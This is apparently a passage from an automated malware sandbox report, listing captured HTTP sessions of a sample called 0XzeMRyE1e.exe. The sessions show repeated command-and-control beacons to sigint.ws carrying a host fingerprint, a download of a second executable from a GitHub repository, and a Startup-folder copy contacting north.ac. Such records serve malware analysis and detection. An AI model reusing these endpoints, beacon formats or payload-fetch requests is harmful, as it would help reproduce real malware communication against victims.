                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:54:36.000215054 CEST3457INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:54:35 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              66192.168.2.44984080.66.64.10380C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              Jun 2, 2022 01:54:36.304157019 CEST3458OUTPOST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:54:36.486763000 CEST3458INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:54:36 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              67192.168.2.44984180.66.64.10380C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              Jun 2, 2022 01:54:36.841593981 CEST3459OUTPOST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:54:37.025984049 CEST3459INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:54:36 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              68192.168.2.44984280.66.64.10380C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              Jun 2, 2022 01:54:37.470331907 CEST3460OUTPOST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:54:37.654067039 CEST3460INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:54:37 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              69192.168.2.44984380.66.64.10380C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              Jun 2, 2022 01:54:37.930779934 CEST3461OUTPOST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:54:38.112637997 CEST3461INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:54:38 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              7192.168.2.449765140.82.121.380C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              Jun 2, 2022 01:53:41.050184965 CEST1548OUTGET /neiqops/ajajaj/raw/main/file_22613.exe HTTP/1.1
                                                                              Host: github.com
                                                                              Jun 2, 2022 01:53:41.067187071 CEST1548INHTTP/1.1 301 Moved Permanently
                                                                              Content-Length: 0
                                                                              Location: https://github.com/neiqops/ajajaj/raw/main/file_22613.exe


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              70192.168.2.44984480.66.64.10380C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              Jun 2, 2022 01:54:38.495305061 CEST3462OUTPOST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:54:38.679277897 CEST3462INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:54:38 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              71192.168.2.44984580.66.64.10380C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              Jun 2, 2022 01:54:39.016304970 CEST3463OUTPOST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:54:39.200731039 CEST3463INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:54:39 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              72192.168.2.44984680.66.64.10380C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              Jun 2, 2022 01:54:39.535861969 CEST3464OUTPOST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:54:39.718588114 CEST3464INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:54:39 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              73192.168.2.44984780.66.64.10380C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              Jun 2, 2022 01:54:40.420239925 CEST3465OUTPOST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:54:40.603180885 CEST3465INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:54:40 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              74192.168.2.44984880.66.64.10380C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              Jun 2, 2022 01:54:40.940109968 CEST3466OUTPOST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:54:41.123086929 CEST3466INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:54:41 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              75192.168.2.44984980.66.64.10380C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              Jun 2, 2022 01:54:41.432431936 CEST3466OUTPOST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:54:41.611175060 CEST3467INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:54:41 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              76192.168.2.44985080.66.64.10380C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              Jun 2, 2022 01:54:42.196474075 CEST3467OUTPOST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:54:42.380084991 CEST3468INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:54:42 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              77192.168.2.44985180.66.64.10380C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              Jun 2, 2022 01:54:43.268559933 CEST3468OUTPOST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:54:43.447304010 CEST3469INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:54:43 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              78192.168.2.44985280.66.64.10380C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              Jun 2, 2022 01:54:46.408171892 CEST3469OUTPOST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:54:46.592335939 CEST3470INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:54:46 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              79192.168.2.44985380.66.64.10380C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              Jun 2, 2022 01:54:46.902584076 CEST3470OUTPOST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:54:47.082290888 CEST3470INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:54:47 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              8192.168.2.449781104.21.2.20580C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0XzeMRyE1e.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              Jun 2, 2022 01:53:54.854033947 CEST3197OUTGET /760 HTTP/1.1
                                                                              Host: north.ac
                                                                              Connection: Keep-Alive
                                                                              Jun 2, 2022 01:53:54.899542093 CEST3197INHTTP/1.1 301 Moved Permanently
                                                                              Date: Wed, 01 Jun 2022 23:53:54 GMT
                                                                              Transfer-Encoding: chunked
                                                                              Connection: keep-alive
                                                                              Cache-Control: max-age=3600
                                                                              Expires: Thu, 02 Jun 2022 00:53:54 GMT
                                                                              Location: https://north.ac/760
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=X2ueoCTvMjfIrkdRP1UPJ2G%2BoVOT71mmakUDu1x1e1OxhMRAH%2F%2FQqHzOmLmhs%2B3e8PKpGVyYapNLUOtQ8HOmsmIg%2FHv9FaszY3FCOb2MRxZ6n3btkxn2pPLngQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 714bdf15eec4e640-LHR
                                                                              alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                              Data Ascii: 0


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              80192.168.2.44985480.66.64.10380C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              Jun 2, 2022 01:54:47.429553032 CEST3471OUTPOST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:54:47.611768961 CEST3471INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:54:47 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              81192.168.2.44985580.66.64.10380C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              Jun 2, 2022 01:54:48.113243103 CEST3472OUTPOST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:54:48.297286987 CEST3472INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:54:48 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              82192.168.2.44985680.66.64.10380C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              Jun 2, 2022 01:54:48.512197971 CEST3473OUTPOST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:54:48.693202019 CEST3473INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:54:48 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              83192.168.2.44985780.66.64.10380C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              Jun 2, 2022 01:54:48.921276093 CEST3474OUTPOST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:54:49.107945919 CEST3474INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:54:49 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              84192.168.2.44985880.66.64.10380C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              Jun 2, 2022 01:54:49.360292912 CEST3475OUTPOST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
